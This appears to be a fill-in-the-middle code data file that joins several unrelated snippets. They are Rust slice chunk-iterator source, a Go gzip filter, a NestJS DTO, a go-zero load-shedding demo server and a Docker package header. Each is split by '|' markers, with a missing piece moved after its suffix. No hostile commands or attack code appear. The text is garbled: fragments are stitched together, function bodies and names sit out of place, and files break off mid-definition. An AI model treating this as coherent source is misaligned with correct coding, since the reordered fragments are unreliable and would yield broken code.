let start = (len - 1 - n) * self.chunk_size;
let end = start + self.chunk_size;
let (temp, _tail) = mem::replace(&mut self.v, &mut []).split_at_mut(end);
let (head, nth_back) = temp.split_at_mut(start);
self.v = head;
Some(nth_back)
}
}
}
#[stable(feature = "chunks_exact", since = "1.31.0")]
impl<T> ExactSizeIterator for ChunksExactMut<'_, T> {
fn is_empty(&self) -> bool {
self.v.is_empty()
}
}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<T> TrustedLen for ChunksExactMut<'_, T> {}
#[stable(feature = "chunks_exact", since = "1.31.0")]
impl<T> FusedIterator for ChunksExactMut<'_, T> {}
#[doc(hidden)]
#[unstable(feature = "trusted_random_access", issue = "none")]
unsafe impl<'a, T> TrustedRandomAccess for ChunksExactMut<'a, T> {
fn may_have_side_effect() -> bool {
false
}
}
/// A windowed iterator over a slice in overlapping chunks (`N` elements at a
/// time), starting at the beginning of the slice
///
/// This struct is created by the [`array_windows`] method on [slices].
///
/// # Example
///
/// ```
/// #![feature(array_windows)]
///
/// let slice = [0, 1, 2, 3];
/// let iter = slice.array_windows::<2>();
/// ```
///
/// [`array_windows`]: ../../std/primitive.slice.html#method.array_windows
/// [slices]: ../../std/primitive.slice.html
#[derive(Debug, Clone, Copy)]
#[unstable(feature = "array_windows", issue = "75027")]
pub struct ArrayWindows<'a, T: 'a, const N: usize> {
slice_head: *const T,
num: usize,
marker: PhantomData<&'a [T; N]>,
}
impl<'a, T: 'a, const N: usize> ArrayWindows<'a, T, N> {
#[inline]
pub(super) fn new(slice: &'a [T]) -> Self {
let num_windows = slice.len().saturating_sub(N - 1);
Self { slice_head: slice.as_ptr(), num: num_windows, marker: PhantomData }
}
}
#[unstable(feature = "array_windows", issue = "75027")]
impl<'a, T, const N: usize> Iterator for ArrayWindows<'a, T, N> {
type Item = &'a [T; N];
#[inline]
fn next(&mut self) -> Option<Self::Item> {
if self.num == 0 {
return None;
}
// SAFETY:
// This is safe because it's indexing into a slice guaranteed to be length > N.
let ret = unsafe { &*self.slice_head.cast::<[T; N]>() };
// SAFETY: Guaranteed that there are at least 1 item remaining otherwise
// earlier branch would've been hit
self.slice_head = unsafe { self.slice_head.add(1) };
self.num -= 1;
Some(ret)
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
(self.num, Some(self.num))
}
#[inline]
fn count(self) -> usize {
self.num
}
#[inline]
fn nth(&mut self, n: usize) -> Option<Self::Item> {
if self.num <= n {
self.num = 0;
return None;
}
// SAFETY:
// This is safe because it's indexing into a slice guaranteed to be length > N.
let ret = unsafe { &*self.slice_head.add(n).cast::<[T; N]>() };
// SAFETY: Guaranteed that there are at least n items remaining
self.slice_head = unsafe { self.slice_head.add(n + 1) };
self.num -= n + 1;
Some(ret)
}
#[inline]
fn last(mut self) -> Option<Self::Item> {
self.nth(self.num.checked_sub(1)?)
}
}
#[unstable(feature = "array_windows", issue = "75027")]
impl<'a, T, const N: usize> DoubleEndedIterator for ArrayWindows<'a, T, N> {
#[inline]
fn next_back(&mut self) -> Option<&'a [T; N]> {
if self.num == 0 {
return None;
}
// SAFETY: Guaranteed that there are n items remaining, n-1 for 0-indexing.
let ret = unsafe { &*self.slice_head.add(self.num - 1).cast::<[T; N]>() };
self.num -= 1;
Some(ret)
}
#[inline]
fn nth_back(&mut self, n: usize) -> Option<&'a [T; N]> {
if self.num <= n {
self.num = 0;
return None;
}
// SAFETY: Guaranteed that there are n items remaining, n-1 for 0-indexing.
let ret = unsafe { &*self.slice_head.add(self.num - (n + 1)).cast::<[T; N]>() };
self.num -= n + 1;
Some(ret)
}
}
#[unstable(feature = "array_windows", issue = "75027")]
impl<T, const N: usize> ExactSizeIterator for ArrayWindows<'_, T, N> {
fn is_empty(&self) -> bool {
self.num == 0
}
}
/// An iterator over a slice in (non-overlapping) chunks (`N` elements at a
/// time), starting at the beginning of the slice.
///
/// When the slice len is not evenly divided by the chunk size, the last
/// up to `N-1` elements will be omitted but can be retrieved from
/// the [`remainder`] function from the iterator.
///
/// This struct is created by the [`array_chunks`] method on [slices].
///
/// # Example
///
/// ```
/// #![feature(array_chunks)]
///
/// let slice = ['l', 'o', 'r', 'e', 'm'];
/// let iter = slice.array_chunks::<2>();
/// ```
///
/// [`array_chunks`]: ../../std/primitive.slice.html#method.array_chunks
/// [`remainder`]: ArrayChunks::remainder
/// [slices]: ../../std/primitive.slice.html
#[derive(Debug)]
#[unstable(feature = "array_chunks", issue = "74985")]
pub struct ArrayChunks<'a, T: 'a, const N: usize> {
iter: Iter<'a, [T; N]>,
rem: &'a [T],
}
impl<'a, T, const N: usize> ArrayChunks<'a, T, N> {
#[inline]
pub(super) fn new(slice: &'a [T]) -> Self {
let len = slice.len() / N;
let (fst, snd) = slice.split_at(len * N);
// SAFETY: We cast a slice of `len * N` elements into
// a slice of `len` many `N` elements chunks.
let array_slice: &[[T; N]] = unsafe { from_raw_parts(fst.as_ptr().cast(), len) };
Self { iter: array_slice.iter(), rem: snd }
}
/// Returns the remainder of the original slice that is not going to be
/// returned by the iterator. The returned slice has at most `N-1`
/// elements.
#[unstable(feature = "array_chunks", issue = "74985")]
pub fn remainder(&self) -> &'a [T] {
self.rem
}
}
// FIXME(#26925) Remove in favor of `#[derive(Clone)]`
#[unstable(feature = "array_chunks", issue = "74985")]
impl<T, const N: usize> Clone for ArrayChunks<'_, T, N> {
fn clone(&self) -> Self {
ArrayChunks { iter: self.iter.clone(), rem: self.rem }
}
}
#[unstable(feature = "array_chunks", issue = "74985")]
impl<'a, T, const N: usize> Iterator for ArrayChunks<'a, T, N> {
type Item = &'a [T; N];
#[inline]
fn next(&mut self) -> Option<&'a [T; N]> {
self.iter.next()
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) |
#[inline]
fn count(self) -> usize {
self.iter.count()
}
#[inline]
fn nth(&mut self, n: usize) -> Option<Self::Item> {
self.iter.nth(n)
}
#[inline]
fn last(self) -> Option<Self::Item> {
self.iter.last()
}
unsafe fn __iterator_get_unchecked(&mut self, i: usize) -> &'a [T; N] {
// SAFETY: The safety guarantees of `__iterator_get_unchecked` are
// transferred to the caller.
unsafe { self.iter.__iterator_get_unchecked(i) }
}
}
#[unstable(feature = "array_chunks", issue = "74985")]
impl<'a, T, const N: usize> DoubleEndedIterator for ArrayChunks<'a, T, N> {
#[inline]
fn next_back(&mut self) -> Option<&'a [T; N]> {
self.iter.next_back()
}
#[inline]
fn nth_back(&mut self, n: usize) -> Option<Self::Item> {
self.iter.nth_back(n)
}
}
#[unstable(feature = "array_chunks", issue = "74985")]
impl<T, const N: usize> ExactSizeIterator for ArrayChunks<'_, T, N> {
fn is_empty(&self) -> bool {
self.iter.is_empty()
}
}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<T, const N: usize> TrustedLen for ArrayChunks<'_, T, N> {}
#[unstable(feature = "array_chunks", issue = "74985")]
impl<T, const N: usize> FusedIterator for ArrayChunks<'_, T, N> {}
#[doc(hidden)]
#[unstable(feature = "array_chunks", issue = "74985")]
unsafe impl<'a, T, const N: usize> TrustedRandomAccess for ArrayChunks<'a, T, N> {
fn may_have_side_effect() -> bool {
false
}
}
/// An iterator over a slice in (non-overlapping) mutable chunks (`N` elements
/// at a time), starting at the beginning of the slice.
///
/// When the slice len is not evenly divided by the chunk size, the last
/// up to `N-1` elements will be omitted but can be retrieved from
/// the [`into_remainder`] function from the iterator.
///
/// This struct is created by the [`array_chunks_mut`] method on [slices].
///
/// # Example
///
/// ```
/// #![feature(array_chunks)]
///
/// let mut slice = ['l', 'o', 'r', 'e', 'm'];
/// let iter = slice.array_chunks_mut::<2>();
/// ```
///
/// [`array_chunks_mut`]: ../../std/primitive.slice.html#method.array_chunks_mut
/// [`into_remainder`]: ../../std/slice/struct.ArrayChunksMut.html#method.into_remainder
/// [slices]: ../../std/primitive.slice.html
#[derive(Debug)]
#[unstable(feature = "array_chunks", issue = "74985")]
pub struct ArrayChunksMut<'a, T: 'a, const N: usize> {
iter: IterMut<'a, [T; N]>,
rem: &'a mut [T],
}
impl<'a, T, const N: usize> ArrayChunksMut<'a, T, N> {
#[inline]
pub(super) fn new(slice: &'a mut [T]) -> Self {
let len = slice.len() / N;
let (fst, snd) = slice.split_at_mut(len * N);
// SAFETY: We cast a slice of `len * N` elements into
// a slice of `len` many `N` elements chunks.
unsafe {
let array_slice: &mut [[T; N]] = from_raw_parts_mut(fst.as_mut_ptr().cast(), len);
Self { iter: array_slice.iter_mut(), rem: snd }
}
}
/// Returns the remainder of the original slice that is not going to be
/// returned by the iterator. The returned slice has at most `N-1`
/// elements.
#[unstable(feature = "array_chunks", issue = "74985")]
pub fn into_remainder(self) -> &'a mut [T] {
self.rem
}
}
#[unstable(feature = "array_chunks", issue = "74985")]
impl<'a, T, const N: usize> Iterator for ArrayChunksMut<'a, T, N> {
type Item = &'a mut [T; N];
#[inline]
fn next(&mut self) -> Option<&'a mut [T; N]> {
self.iter.next()
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
self.iter.size_hint()
}
#[inline]
fn count(self) -> usize {
self.iter.count()
}
#[inline]
fn nth(&mut self, n: usize) -> Option<Self::Item> {
self.iter.nth(n)
}
#[inline]
fn last(self) -> Option<Self::Item> {
self.iter.last()
}
unsafe fn __iterator_get_unchecked(&mut self, i: usize) -> &'a mut [T; N] {
// SAFETY: The safety guarantees of `__iterator_get_unchecked` are transferred to
// the caller.
unsafe { self.iter.__iterator_get_unchecked(i) }
}
}
#[unstable(feature = "array_chunks", issue = "74985")]
impl<'a, T, const N: usize> DoubleEndedIterator for ArrayChunksMut<'a, T, N> {
#[inline]
fn next_back(&mut self) -> Option<&'a mut [T; N]> {
self.iter.next_back()
}
#[inline]
fn nth_back(&mut self, n: usize) -> Option<Self::Item> {
self.iter.nth_back(n)
}
}
#[unstable(feature = "array_chunks", issue = "74985")]
impl<T, const N: usize> ExactSizeIterator for ArrayChunksMut<'_, T, N> {
fn is_empty(&self) -> bool {
self.iter.is_empty()
}
}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<T, const N: usize> TrustedLen for ArrayChunksMut<'_, T, N> {}
#[unstable(feature = "array_chunks", issue = "74985")]
impl<T, const N: usize> FusedIterator for ArrayChunksMut<'_, T, N> {}
#[doc(hidden)]
#[unstable(feature = "array_chunks", issue = "74985")]
unsafe impl<'a, T, const N: usize> TrustedRandomAccess for ArrayChunksMut<'a, T, N> {
fn may_have_side_effect() -> bool {
false
}
}
/// An iterator over a slice in (non-overlapping) chunks (`chunk_size` elements at a
/// time), starting at the end of the slice.
///
/// When the slice len is not evenly divided by the chunk size, the last slice
/// of the iteration will be the remainder.
///
/// This struct is created by the [`rchunks`] method on [slices].
///
/// # Example
///
/// ```
/// let slice = ['l', 'o', 'r', 'e', 'm'];
/// let iter = slice.rchunks(2);
/// ```
///
/// [`rchunks`]: ../../std/primitive.slice.html#method.rchunks
/// [slices]: ../../std/primitive.slice.html
#[derive(Debug)]
#[stable(feature = "rchunks", since = "1.31.0")]
pub struct RChunks<'a, T: 'a> {
v: &'a [T],
chunk_size: usize,
}
impl<'a, T: 'a> RChunks<'a, T> {
#[inline]
pub(super) fn new(slice: &'a [T], size: usize) -> Self {
Self { v: slice, chunk_size: size }
}
}
// FIXME(#26925) Remove in favor of `#[derive(Clone)]`
#[stable(feature = "rchunks", since = "1.31.0")]
impl<T> Clone for RChunks<'_, T> {
fn clone(&self) -> Self {
RChunks { v: self.v, chunk_size: self.chunk_size }
}
}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<'a, T> Iterator for RChunks<'a, T> {
type Item = &'a [T];
#[inline]
fn next(&mut self) -> Option<&'a [T]> {
if self.v.is_empty() {
None
} else {
let chunksz = cmp::min(self.v.len(), self.chunk_size);
let (fst, snd) = self.v.split_at(self.v.len() - chunksz);
self.v = fst;
Some(snd)
}
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
if self.v.is_empty() {
(0, Some(0))
} else {
let n = self.v.len() / self.chunk_size;
let rem = self.v.len() % self.chunk_size;
let n = if rem > 0 { n + 1 } else { n };
(n, Some(n))
}
}
#[inline]
fn count(self) -> usize {
self.len()
}
#[inline]
fn nth(&mut self, n: usize) -> Option<Self::Item> {
let (end, overflow) = n.overflowing_mul(self.chunk_size);
if end >= self.v.len() || overflow {
self.v = &[];
None
} else {
// Can't underflow because of the check above
let end = self.v.len() - end;
let start = match end.checked_sub(self.chunk_size) {
Some(sum) => sum,
None => 0,
};
let nth = &self.v[start..end];
self.v = &self.v[0..start];
Some(nth)
}
}
#[inline]
fn last(self) -> Option<Self::Item> {
if self.v.is_empty() {
None
} else {
let rem = self.v.len() % self.chunk_size;
let end = if rem == 0 { self.chunk_size } else { rem };
Some(&self.v[0..end])
}
}
#[doc(hidden)]
unsafe fn __iterator_get_unchecked(&mut self, idx: usize) -> Self::Item {
let end = self.v.len() - idx * self.chunk_size;
let start = match end.checked_sub(self.chunk_size) {
None => 0,
Some(start) => start,
};
// SAFETY: mostly identical to `Chunks::__iterator_get_unchecked`.
unsafe { from_raw_parts(self.v.as_ptr().add(start), end - start) }
}
}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<'a, T> DoubleEndedIterator for RChunks<'a, T> {
#[inline]
fn next_back(&mut self) -> Option<&'a [T]> {
if self.v.is_empty() {
None
} else {
let remainder = self.v.len() % self.chunk_size;
let chunksz = if remainder != 0 { remainder } else { self.chunk_size };
let (fst, snd) = self.v.split_at(chunksz);
self.v = snd;
Some(fst)
}
}
#[inline]
fn nth_back(&mut self, n: usize) -> Option<Self::Item> {
let len = self.len();
if n >= len {
self.v = &[];
None
} else {
// can't underflow because `n < len`
let offset_from_end = (len - 1 - n) * self.chunk_size;
let end = self.v.len() - offset_from_end;
let start = end.saturating_sub(self.chunk_size);
let nth_back = &self.v[start..end];
self.v = &self.v[end..];
Some(nth_back)
}
}
}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<T> ExactSizeIterator for RChunks<'_, T> {}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<T> TrustedLen for RChunks<'_, T> {}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<T> FusedIterator for RChunks<'_, T> {}
#[doc(hidden)]
#[unstable(feature = "trusted_random_access", issue = "none")]
unsafe impl<'a, T> TrustedRandomAccess for RChunks<'a, T> {
fn may_have_side_effect() -> bool {
false
}
}
/// An iterator over a slice in (non-overlapping) mutable chunks (`chunk_size`
/// elements at a time), starting at the end of the slice.
///
/// When the slice len is not evenly divided by the chunk size, the last slice
/// of the iteration will be the remainder.
///
/// This struct is created by the [`rchunks_mut`] method on [slices].
///
/// # Example
///
/// ```
/// let mut slice = ['l', 'o', 'r', 'e', 'm'];
/// let iter = slice.rchunks_mut(2);
/// ```
///
/// [`rchunks_mut`]: ../../std/primitive.slice.html#method.rchunks_mut
/// [slices]: ../../std/primitive.slice.html
#[derive(Debug)]
#[stable(feature = "rchunks", since = "1.31.0")]
pub struct RChunksMut<'a, T: 'a> {
v: &'a mut [T],
chunk_size: usize,
}
impl<'a, T: 'a> RChunksMut<'a, T> {
#[inline]
pub(super) fn new(slice: &'a mut [T], size: usize) -> Self {
Self { v: slice, chunk_size: size }
}
}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<'a, T> Iterator for RChunksMut<'a, T> {
type Item = &'a mut [T];
#[inline]
fn next(&mut self) -> Option<&'a mut [T]> {
if self.v.is_empty() {
None
} else {
let sz = cmp::min(self.v.len(), self.chunk_size);
let tmp = mem::replace(&mut self.v, &mut []);
let tmp_len = tmp.len();
let (head, tail) = tmp.split_at_mut(tmp_len - sz);
self.v = head;
Some(tail)
}
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
if self.v.is_empty() {
(0, Some(0))
} else {
let n = self.v.len() / self.chunk_size;
let rem = self.v.len() % self.chunk_size;
let n = if rem > 0 { n + 1 } else { n };
(n, Some(n))
}
}
#[inline]
fn count(self) -> usize {
self.len()
}
#[inline]
fn nth(&mut self, n: usize) -> Option<&'a mut [T]> {
let (end, overflow) = n.overflowing_mul(self.chunk_size);
if end >= self.v.len() || overflow {
self.v = &mut [];
None
} else {
// Can't underflow because of the check above
let end = self.v.len() - end;
let start = match end.checked_sub(self.chunk_size) {
Some(sum) => sum,
None => 0,
};
let tmp = mem::replace(&mut self.v, &mut []);
let (head, tail) = tmp.split_at_mut(start);
let (nth, _) = tail.split_at_mut(end - start);
self.v = head;
Some(nth)
}
}
#[inline]
fn last(self) -> Option<Self::Item> {
if self.v.is_empty() {
None
} else {
let rem = self.v.len() % self.chunk_size;
let end = if rem == 0 { self.chunk_size } else { rem };
Some(&mut self.v[0..end])
}
}
#[doc(hidden)]
unsafe fn __iterator_get_unchecked(&mut self, idx: usize) -> Self::Item {
let end = self.v.len() - idx * self.chunk_size;
let start = match end.checked_sub(self.chunk_size) {
None => 0,
Some(start) => start,
};
// SAFETY: see comments for `RChunks::__iterator_get_unchecked` and
// `ChunksMut::__iterator_get_unchecked`
unsafe { from_raw_parts_mut(self.v.as_mut_ptr().add(start), end - start) }
}
}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<'a, T> DoubleEndedIterator for RChunksMut<'a, T> {
#[inline]
fn next_back(&mut self) -> Option<&'a mut [T]> {
if self.v.is_empty() {
None
} else {
let remainder = self.v.len() % self.chunk_size;
let sz = if remainder != 0 { remainder } else { self.chunk_size };
let tmp = mem::replace(&mut self.v, &mut []);
let (head, tail) = tmp.split_at_mut(sz);
self.v = tail;
Some(head)
}
}
#[inline]
fn nth_back(&mut self, n: usize) -> Option<Self::Item> {
let len = self.len();
if n >= len {
self.v = &mut [];
None
} else {
// can't underflow because `n < len`
let offset_from_end = (len - 1 - n) * self.chunk_size;
let end = self.v.len() - offset_from_end;
let start = end.saturating_sub(self.chunk_size);
let (tmp, tail) = mem::replace(&mut self.v, &mut []).split_at_mut(end);
let (_, nth_back) = tmp.split_at_mut(start);
self.v = tail;
Some(nth_back)
}
}
}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<T> ExactSizeIterator for RChunksMut<'_, T> {}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<T> TrustedLen for RChunksMut<'_, T> {}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<T> FusedIterator for RChunksMut<'_, T> {}
#[doc(hidden)]
#[unstable(feature = "trusted_random_access", issue = "none")]
unsafe impl<'a, T> TrustedRandomAccess for RChunksMut<'a, T> {
fn may_have_side_effect() -> bool {
false
}
}
/// An iterator over a slice in (non-overlapping) chunks (`chunk_size` elements at a
/// time), starting at the end of the slice.
///
/// When the slice len is not evenly divided by the chunk size, the last
/// up to `chunk_size-1` elements will be omitted but can be retrieved from
/// the [`remainder`] function from the iterator.
///
/// This struct is created by the [`rchunks_exact`] method on [slices].
///
/// # Example
///
/// ```
/// let slice = ['l', 'o', 'r', 'e', 'm'];
/// let iter = slice.rchunks_exact(2);
/// ```
///
/// [`rchunks_exact`]: ../../std/primitive.slice.html#method.rchunks_exact
/// [`remainder`]: ChunksExact::remainder
/// [slices]: ../../std/primitive.slice.html
#[derive(Debug)]
#[stable(feature = "rchunks", since = "1.31.0")]
pub struct RChunksExact<'a, T: 'a> {
v: &'a [T],
rem: &'a [T],
chunk_size: usize,
}
impl<'a, T> RChunksExact<'a, T> {
#[inline]
pub(super) fn new(slice: &'a [T], chunk_size: usize) -> Self {
let rem = slice.len() % chunk_size;
// SAFETY: 0 <= rem <= slice.len() by construction above
let (fst, snd) = unsafe { slice.split_at_unchecked(rem) };
Self { v: snd, rem: fst, chunk_size }
}
/// Returns the remainder of the original slice that is not going to be
/// returned by the iterator. The returned slice has at most `chunk_size-1`
/// elements.
#[stable(feature = "rchunks", since = "1.31.0")]
pub fn remainder(&self) -> &'a [T] {
self.rem
}
}
// FIXME(#26925) Remove in favor of `#[derive(Clone)]`
#[stable(feature = "rchunks", since = "1.31.0")]
impl<'a, T> Clone for RChunksExact<'a, T> {
fn clone(&self) -> RChunksExact<'a, T> {
RChunksExact { v: self.v, rem: self.rem, chunk_size: self.chunk_size }
}
}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<'a, T> Iterator for RChunksExact<'a, T> {
type Item = &'a [T];
#[inline]
fn next(&mut self) -> Option<&'a [T]> {
if self.v.len() < self.chunk_size {
None
} else {
let (fst, snd) = self.v.split_at(self.v.len() - self.chunk_size);
self.v = fst;
Some(snd)
}
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
let n = self.v.len() / self.chunk_size;
(n, Some(n))
}
#[inline]
fn count(self) -> usize {
self.len()
}
#[inline]
fn nth(&mut self, n: usize) -> Option<Self::Item> {
let (end, overflow) = n.overflowing_mul(self.chunk_size);
if end >= self.v.len() || overflow {
self.v = &[];
None
} else {
let (fst, _) = self.v.split_at(self.v.len() - end);
self.v = fst;
self.next()
}
}
#[inline]
fn last(mut self) -> Option<Self::Item> {
self.next_back()
}
#[doc(hidden)]
unsafe fn __iterator_get_unchecked(&mut self, idx: usize) -> Self::Item {
let end = self.v.len() - idx * self.chunk_size;
let start = end - self.chunk_size;
// SAFETY:
// SAFETY: mostmy identical to `Chunks::__iterator_get_unchecked`.
unsafe { from_raw_parts(self.v.as_ptr().add(start), self.chunk_size) }
}
}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<'a, T> DoubleEndedIterator for RChunksExact<'a, T> {
#[inline]
fn next_back(&mut self) -> Option<&'a [T]> {
if self.v.len() < self.chunk_size {
None
} else {
let (fst, snd) = self.v.split_at(self.chunk_size);
self.v = snd;
Some(fst)
}
}
#[inline]
fn nth_back(&mut self, n: usize) -> Option<Self::Item> {
let len = self.len();
if n >= len {
self.v = &[];
None
} else {
// now that we know that `n` corresponds to a chunk,
// none of these operations can underflow/overflow
let offset = (len - n) * self.chunk_size;
let start = self.v.len() - offset;
let end = start + self.chunk_size;
let nth_back = &self.v[start..end];
self.v = &self.v[end..];
Some(nth_back)
}
}
}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<'a, T> ExactSizeIterator for RChunksExact<'a, T> {
fn is_empty(&self) -> bool {
self.v.is_empty()
}
}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<T> TrustedLen for RChunksExact<'_, T> {}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<T> FusedIterator for RChunksExact<'_, T> {}
#[doc(hidden)]
#[unstable(feature = "trusted_random_access", issue = "none")]
unsafe impl<'a, T> TrustedRandomAccess for RChunksExact<'a, T> {
fn may_have_side_effect() -> bool {
false
}
}
/// An iterator over a slice in (non-overlapping) mutable chunks (`chunk_size`
/// elements at a time), starting at the end of the slice.
///
/// When the slice len is not evenly divided by the chunk size, the last up to
/// `chunk_size-1` elements will be omitted but can be retrieved from the
/// [`into_remainder`] function from the iterator.
///
/// This struct is created by the [`rchunks_exact_mut`] method on [slices].
///
/// # Example
///
/// ```
/// let mut slice = ['l', 'o', 'r', 'e', 'm'];
/// let iter = slice.rchunks_exact_mut(2);
/// ```
///
/// [`rchunks_exact_mut`]: ../../std/primitive.slice.html#method.rchunks_exact_mut
/// [`into_remainder`]: ChunksExactMut::into_remainder
/// [slices]: ../../std/primitive.slice.html
#[derive(Debug)]
#[stable(feature = "rchunks", since = "1.31.0")]
pub struct RChunksExactMut<'a, T: 'a> {
v: &'a mut [T],
rem: &'a mut [T],
chunk_size: usize,
}
impl<'a, T> RChunksExactMut<'a, T> {
#[inline]
pub(super) fn new(slice: &'a mut [T], chunk_size: usize) -> Self {
let rem = slice.len() % chunk_size;
// SAFETY: 0 <= rem <= slice.len() by construction above
let (fst, snd) = unsafe { slice.split_at_mut_unchecked(rem) };
Self { v: snd, rem: fst, chunk_size }
}
/// Returns the remainder of the original slice that is not going to be
/// returned by the iterator. The returned slice has at most `chunk_size-1`
/// elements.
#[stable(feature = "rchunks", since = "1.31.0")]
pub fn into_remainder(self) -> &'a mut [T] {
self.rem
}
}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<'a, T> Iterator for RChunksExactMut<'a, T> {
type Item = &'a mut [T];
#[inline]
fn next(&mut self) -> Option<&'a mut [T]> {
if self.v.len() < self.chunk_size {
None
} else {
let tmp = mem::replace(&mut self.v, &mut []);
let tmp_len = tmp.len();
let (head, tail) = tmp.split_at_mut(tmp_len - self.chunk_size);
self.v = head;
Some(tail)
}
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
let n = self.v.len() / self.chunk_size;
(n, Some(n))
}
#[inline]
fn count(self) -> usize {
self.len()
}
#[inline]
fn nth(&mut self, n: usize) -> Option<&'a mut [T]> {
let (end, overflow) = n.overflowing_mul(self.chunk_size);
if end >= self.v.len() || overflow {
self.v = &mut [];
None
} else {
let tmp = mem::replace(&mut self.v, &mut []);
let tmp_len = tmp.len();
let (fst, _) = tmp.split_at_mut(tmp_len - end);
self.v = fst;
self.next()
}
}
#[inline]
fn last(mut self) -> Option<Self::Item> {
self.next_back()
}
#[doc(hidden)]
unsafe fn __iterator_get_unchecked(&mut self, idx: usize) -> Self::Item {
let end = self.v.len() - idx * self.chunk_size;
let start = end - self.chunk_size;
// SAFETY: see comments for `RChunksMut::__iterator_get_unchecked`.
unsafe { from_raw_parts_mut(self.v.as_mut_ptr().add(start), self.chunk_size) }
}
}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<'a, T> DoubleEndedIterator for RChunksExactMut<'a, T> {
#[inline]
fn next_back(&mut self) -> Option<&'a mut [T]> {
if self.v.len() < self.chunk_size {
None
} else {
let tmp = mem::replace(&mut self.v, &mut []);
let (head, tail) = tmp.split_at_mut(self.chunk_size);
self.v = tail;
Some(head)
}
}
#[inline]
fn nth_back(&mut self, n: usize) -> Option<Self::Item> {
let len = self.len();
if n >= len {
self.v = &mut [];
None
} else {
// now that we know that `n` corresponds to a chunk,
// none of these operations can underflow/overflow
let offset = (len - n) * self.chunk_size;
let start = self.v.len() - offset;
let end = start + self.chunk_size;
let (tmp, tail) = mem::replace(&mut self.v, &mut []).split_at_mut(end);
let (_, nth_back) = tmp.split_at_mut(start);
self.v = tail;
Some(nth_back)
}
}
}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<T> ExactSizeIterator for RChunksExactMut<'_, T> {
fn is_empty(&self) -> bool {
self.v.is_empty()
}
}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<T> TrustedLen for RChunksExactMut<'_, T> {}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<T> FusedIterator for RChunksExactMut<'_, T> {}
#[doc(hidden)]
#[unstable(feature = "trusted_random_access", issue = "none")]
unsafe impl<'a, T> TrustedRandomAccess for RChunksExactMut<'a, T> {
fn may_have_side_effect() -> bool {
false
}
}
#[doc(hidden)]
#[unstable(feature = "trusted_random_access", issue = "none")]
unsafe impl<'a, T> TrustedRandomAccess for Iter<'a, T> {
fn may_have_side_effect() -> bool {
false
}
}
#[doc(hidden)]
#[unstable(feature = "trusted_random_access", issue = "none")]
unsafe impl<'a, T> TrustedRandomAccess for IterMut<'a, T> {
fn may_have_side_effect() -> bool {
false
}
}
| {
self.iter.size_hint()
} |
zip.go | // Copyright 2021 Google LLC
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// https://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package filter
import (
"compress/gzip"
"context"
"io"
"net/http"
)
// GZip applies gzip encoding to the media.
//
// This is an example of a streaming filter. This will use very little memory
// and add very little latency to responses.
func | (ctx context.Context, handle MediaFilterHandle) error {
defer handle.input.Close()
defer handle.output.Close()
// delete content-length header. It is no longer accurate.
handle.response.Header().Del("Content-Length")
// add a content-encoding
handle.response.Header().Set("Content-Encoding", "gzip")
// zip the content
gz, err := gzip.NewWriterLevel(handle.output, 6)
if err != nil {
return FilterError(handle, http.StatusInternalServerError, "zip filter: %v", err)
}
defer gz.Close()
io.Copy(gz, handle.input)
return nil
}
| GZip |
create-category.dto.ts | import { OmitType, PartialType } from '@nestjs/swagger';
import { Category } from '../entities/category.entity'; |
export class CreateCategoryDto extends PartialType(OmitType(Category, ['id', 'user', 'tasks'])) { } |
|
server.go | package main
import (
"fmt"
"net/http"
"runtime"
"time"
"zero/core/fx"
"zero/core/logx"
"zero/core/service"
"zero/core/stat"
"zero/rest"
)
const duration = time.Millisecond
func main() {
go func() {
ticker := time.NewTicker(time.Second)
defer ticker.Stop()
for range ticker.C {
fmt.Printf("cpu: %d\n", stat.CpuUsage())
}
}()
logx.Disable()
engine := rest.MustNewServer(rest.RestConf{
ServiceConf: service.ServiceConf{
Log: logx.LogConf{
Mode: "console",
},
},
Host: "0.0.0.0",
Port: 3333,
CpuThreshold: 800,
})
defer engine.Stop()
engine.AddRoute(rest.Route{
Method: http.MethodGet,
Path: "/",
Handler: func(w http.ResponseWriter, r *http.Request) {
if err := fx.DoWithTimeout(func() error {
job(duration)
return nil
}, time.Millisecond*100); err != nil {
w.WriteHeader(http.StatusServiceUnavailable)
}
},
})
engine.Start()
}
func job(duration time.Duration) | {
done := make(chan int)
for i := 0; i < runtime.NumCPU(); i++ {
go func() {
for {
select {
case <-done:
return
default:
}
}
}()
}
time.Sleep(duration)
close(done)
} |
|
docker.go | // Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
// Package docker provides an interface to the system's Docker daemon.
package docker
import (
"fmt"
"path/filepath"
"sort"
"strings"
"github.com/aws/copilot-cli/internal/pkg/term/command"
)
